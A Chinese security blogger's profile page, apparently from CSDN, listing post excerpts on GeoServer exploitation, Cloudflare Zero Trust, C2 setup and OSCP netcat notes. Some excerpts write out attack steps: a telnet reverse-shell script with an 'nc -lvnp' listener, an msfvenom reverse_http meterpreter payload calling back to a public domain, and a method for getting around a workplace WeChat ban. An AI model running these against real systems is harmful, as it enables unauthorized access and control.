- 博客(19)
- 资源 (1)
- 收藏
- 关注
原创 CVE-2024-36401-GeoServer命令执行漏洞测试
写一个用telnet的反弹shell脚本,保存为test.sh。用python的simplehttp起一个服务。客户机执行chmod +x test.sh。攻击机执行:nc -lvnp 端口。
2024-09-14 11:44:52
651
原创 cloudflare zero trust 异地组网,一台跳板机在家连公司内网
本文介绍了通过Cloudflare Zero Trust实现内网访问的配置步骤:1)在服务端创建隧道并添加CIDR路由;2)在Zero Trust面板设置访问控制规则;3)安装Cloudflare One客户端;4)需注意在设备列表中配置可访问域。配置完成后即可通过客户端直接ping通内网10.x.x.x地址。文中特别提醒了设备权限配置这一易忽略的关键步骤。
2026-05-29 14:03:01
48
原创 Anko ai-agent c2平台部署
Agent 直接连 https://ServerIP:9090/api/phantasm。- ghost_relay:端口归 Ghost Relay 管,Listener 只负责"认路"(匹配 endpoint)- https/quic/ssh:端口归 Server 管,必须告诉 Server 在哪个端口起监听服务。- Endpoint:URL 路径(如 /api)方式 1:手动创建 JSON 文件(直连模式)- Port(仅直连类型需要):监听的端口。方式 2:在前端 UI 中创建。
2026-04-28 17:40:52
213
原创 cloudflare ai gateway主要功能
支持自动fallback其他模型,但每个模型只能配一个key,且不支持自定义的provider。可查看使用量情况,可根据gateway密钥、模型晒选。查看单个请求详细内容,并且可疑的请求会标记出来。2.配置自定义的大模型api提供商,官方文档。如添加kimi coding。4.大模型防火墙和防泄漏。1.创建gateway。
2026-03-18 10:53:27
65
原创 免费将 Hugging Face Spaces 应用绑定自定义域名
前往 [https://vercel.com/account/tokens](https://vercel.com/account/tokens) 创建一个 Token,用于 CLI 认证。Vercel 会在请求中注入大量 `x-vercel-*`、`x-forwarded-*` 等内部头,HF Space 后端收到这些异常头后可能拒绝请求。https://api.vercel.com/v9/projects/<项目ID>/domains/your-domain.example.com/verify。
2026-03-12 13:20:33
242
原创 windows微信被禁止使用绕过方法,微信多账户登录
安装uwp版:使用官网下载调整选项为PackageFamilyName在输入框中输入并回车确认下载完点击安装即可。
2026-01-30 10:34:56
339
原创 swagger未授权问题修复
在配置类里面添加如下代码, EnableSwaggerBootstrapUI不支持Swagger3。密码登录配置完不会妨碍正常调用的,只是查看api文档时需要先登录。pringBoot配置Swagger2 在配置类里面设置。如果想兼容 swagger3 如下配置。配置密码登录访问swagger。测试可用,线上不可访问 S。
2025-11-12 10:48:27
259
原创 小黄鸟Reqable联动夜神模拟器,手机抓包配置(可抓zfb)#小程序抓包#app抓包
1.点击5次版本号,打开模拟器的开发者模式2.打开调试3.下载最新版adb,将adb.exe复制到模拟器目录并改名为nox_adb.exe4.检查adb是否连接5.手机和电脑分别安装并连接手机6.配置证书手机端下载证书adb.exe shell进入命令行。
2025-08-22 18:23:57
1577
原创 低成本用sealous搭建msf公网c2
msfvenom.bat -p windows/meterpreter/reverse_http LHOST="公网映射域名" LPORT=80 -f exe > shell.exe。在sealous创建一个devbox并开启公网映射。使用http的payload监听。用ide直接连接获取shell。
2025-06-26 11:46:21
242
原创 使用大模型ai进行代码审计到sql注入
codebase用cursor导入源代码,复制checkmarx中的漏洞位置,让cursor生成payload。checkmarx源代码扫描发现sql注入漏洞。
2025-02-27 18:14:48
426
原创 nginx从雷池Waf反向代理获取真实ip
2.配置nginx.conf,1.com用默认配置,2.com获取X-Forwarded-Host、 X-Forwarded-Proto字段并使用自定义的log格式记录。这是2.com的,加入了真实ip。3.注意在http块中加入。1.先创建两个静态页面。
2024-09-09 18:36:12
1170
1
原创 网安学习之netccat的使用offensive security OSCP 4.1NetCat
在这种情况下,尽管Alice无法将端口绑定到计算机上的/bin/bash上,但她可以将命令提示符的控制权发送到Bob的计算机。在我们的第一个场景中,Bob(运行Windows)请求Alice(运行Linux)的帮助,并要求她连接到他的计算机并远程发出一些命令。为了完成这个场景,Bob需要将cmd.exe绑定到他的公共IP地址上的TCP端口,并要求Alice连接到他的特定IP地址和端口。一旦建立了连接,Alice的Netcat将重定向输入至/bin/bash,输出数据流到端口4444上的Bob的机器。
2023-09-04 19:12:13
236
1
原创 offensive security OSCP学习笔记之端口扫描
其次,许多端口扫描器并不扫描所有可用的端口,通常只扫描预先设置的列表,开放的UDP端口可能被忽略。然而,对于常见的端口,比如SNMP使用的端口161,它将发送一个特定协议的SNMP数据包,试图从绑定到该端口的应用程序获取响应。由于UDP是无连接的,并且无三次握手,使用Netcat对不同目标上的端口160-162运行UDP的端口扫描。要查看有关脚本的更多信息,我们可以使用--script-help选项,它会显示脚本的描述以及一个URL,我们可以在其中找到更详细的信息,例如脚本的参数和使用。
2023-08-23 17:27:10
417
翻译 MotoCMS版本3.4.3 - 服务端模板注入漏洞(SSTI)
漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。MotoCMS 3.4.3 Store Category Template存在Server-Side Template Injection (SSTI)漏洞,攻击者可以利用keyword参数进行攻击。
2023-06-03 20:37:46
279
原创 arp攻击实验
本次实验使用kali linux中的一些工具实现了在同一网段下的arp中间人攻击,但是在实验的过程中也遇到了很多问题,这也是arp攻击的一些局限性。首先是靶机和攻击的机器要在同一网段,虚拟机中默认使用的是NAT网络,ip地址是虚拟的必须切换为桥接网络才能正常实验。在第一次攻击的过程中我发现kali机无法正常ping通靶机,经过查找资料发现,必须关闭windows系统下的防火墙。.攻击主机制造假的arp应答,并发送给被攻击的主机,arp应答中包含除被攻击攻击主机之外的所有主机的IP地址和虚假的MAC地址。
2023-04-09 22:31:10
2163
1
原创 从OSI参考模型的角度分析集线器、网桥、路由器和网关所处的层次及其主要作用
从OSI参考模型的角度分析集线器、网桥、路由器和网关所处的层次及其主要作用
2022-12-07 01:21:42
1265
《企业信息安全建设与运维指南》北京大学出版社出版思维导图
2024-09-27
自然语言处理作业:基于CNN的文本分类模型训练
2023-06-01
自然语言处理课程实验:基于LSTM的命名实体识别
2023-05-24
漏洞扫描工具xray+批量调用xray脚本
2023-04-09
信息收集,子域名扫描工具oneforall
2023-04-09
sql注入工具sqlmap源代码+常用指令
2023-04-09
奢侈品数据爬虫,用python编写的多个爬虫文件
2023-04-09
goproxypool打开即用的代理工具,可执行文件源代码
2023-04-09
数据包处理工具brupsuite+启动器
2023-04-09
目录扫描工具dirsearch
2023-04-09
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅